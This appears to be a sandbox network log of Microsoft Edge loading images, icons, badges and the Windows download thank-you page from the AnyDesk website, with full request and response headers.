cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: TLfZ6FGd0sQhomiD4QSxZ26M9S5KzZuxeuRujaP2PmcLftraBSE2QQ==
age: 61629
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/21-b2d550.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/21-b2d550.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 71mZzEojgd49Xya-mUHFU3NUjOXsbCrN6z89OlAWdLMXbRQ3HXNz5Q==
age: 61630
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/22-7d554a.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/22-7d554a.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: YfurRCpK89HfL5EE_ik3U5m0eaBe7vuaoMcZh6lufW5B5A7qJjtEHQ==
age: 61630
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/23-eb4707.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/23-eb4707.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Wo8-HSQJ6ofgNu3L16TSFBrVd77syklKz7lGHobWFmJwijP7S9Yr2w==
age: 61630
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/24-4c645a.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/24-4c645a.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: TUc9_4N8mhS3Q_54NS7OXajBPXxMBgjy3kRJXA6Z2c3jr3_rHTpgzA==
age: 61631
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/25-93b8a4.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/25-93b8a4.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: menjypONbPkorRimmWtIxEDyQoorTfGotPr2GtMqe8JcciLIznRWLQ==
age: 61631
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/26-da5cfc.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/26-da5cfc.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: MmOYAq-CqjU7rqHQybisE21eI8LCxnPq7Syk_IkT6twS2ih4jy4nvg==
age: 61631
GET

https://anydesk.com/_static/img/sliders/reference-logos/customers/27-f9c6dc.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/sliders/reference-logos/customers/27-f9c6dc.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: s8BM3Vh1cDavt3Nc3haVDSupm8lOd-e6Crf63p_e8m6BV4IcVxom9A==
age: 61631
GET

https://anydesk.com/_static/icons/red/bold/house-heart-e0e8b5.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/house-heart-e0e8b5.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Tdho8vvBkGolgSy_bm-JU3kqChcWa911d2H-BIRv1Z7roS-6IuBWAg==
age: 61631
GET

https://anydesk.com/_static/icons/red/bold/phone-action-check-1-7c275f.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/phone-action-check-1-7c275f.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: HY0T_dloSkWcbvNxjjT2mYGEPtaKaDBmVwm8DdL1mVWNQv6ompx6XA==
age: 61631
GET

https://anydesk.com/en/downloads/thank-you?dv=win_exe

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /en/downloads/thank-you?dv=win_exe HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/html;charset=UTF-8
server: nginx
date: Sat, 05 Oct 2024 00:07:00 GMT
cache-control: max-age=31536000
set-cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99; Path=/; Secure; HttpOnly
content-language: en-NL
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: qNiKG7pDxkaKlFj5FX28Fk8eKx7b-jTZFNuITZmJki-tXJS3dkv9bA==
age: 57653
GET

https://anydesk.com/_static/icons/red/bold/color-brush-paint-e76bfe.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/color-brush-paint-e76bfe.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: DVR3Acpxq-DyFWpjXNBptvmAZu3LJjCLWYkirA3cyYlxM5aZGdfUHQ==
age: 61632
GET

https://anydesk.com/_static/img/badges/industry-leader-cap-badge-ff7a28.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/industry-leader-cap-badge-ff7a28.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 55319
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: kzU75zB5OQXLmlkAAnQT3N1HAiR03jzmbqBI4K3ZXgfUpPtJyovaLQ==
age: 61633
GET

https://anydesk.com/_static/img/badges/frontend-runners-badge-ca1e63.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/frontend-runners-badge-ca1e63.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 54497
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: k56QxKI2L3gDgB9qrwZNtvPf30CTE-OMpUfTCjYwqAML95toX157tQ==
age: 61633
GET

https://anydesk.com/_static/img/badges/industry-leader-ga-badge-a953a8.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/industry-leader-ga-badge-a953a8.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 24038
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: GZpD50Z4Hx1f-kgAdU8CWB5ypMUWTdJRWBMfKN8rFxTUKWRGpXVw2g==
age: 61633
GET

https://anydesk.com/_static/img/badges/industry-leader-g2-badge-96f1be.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/industry-leader-g2-badge-96f1be.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 70210
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 9HgoTC8jhHwGJY3C2hurVkgNnDQIsVBsxttNvNhgubuZnwVBKsxxyA==
age: 61633
GET

https://anydesk.com/_static/img/badges/industry-leader-g2-fastest-implementation-badge-072879.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/badges/industry-leader-g2-fastest-implementation-badge-072879.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 28073
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Jgtuyqgl6ldOdAurk9U0X4fJzu78HdUspcW0karRDq8gHIcddpoR6g==
age: 61633
GET

https://anydesk.com/_static/video-js/video.min-1869f1.js

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/video-js/video.min-1869f1.js HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 3425
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: NnF6rMmn3fspiqZMbpmzEsh6hmA5su3l_xPrhP-3tEGnmAf5sWC2xA==
age: 61633
GET

https://anydesk.com/_static/img/favicon/favicon-32x32-d029f3.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/favicon/favicon-32x32-d029f3.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: lBfdw9Mf4wZXAm8_akSU387q_SiCSFnk9Yw90fkmYrOXJ4jBvbcRCQ==
age: 61616
GET

https://anydesk.com/_static/img/icons/windows-logo-red-db34c5.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/windows-logo-red-db34c5.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ETD5z69KlJ7R4Rojydu_9SS2cVeDfA2SnKJh9WC5vZ9S2jd2Z-MIhA==
age: 61616
GET

https://anydesk.com/_static/img/icons/mac-logo-208af3.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/icons/mac-logo-208af3.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=AA69E1D015327139E5A8E35A6EF1FC99

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:58 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
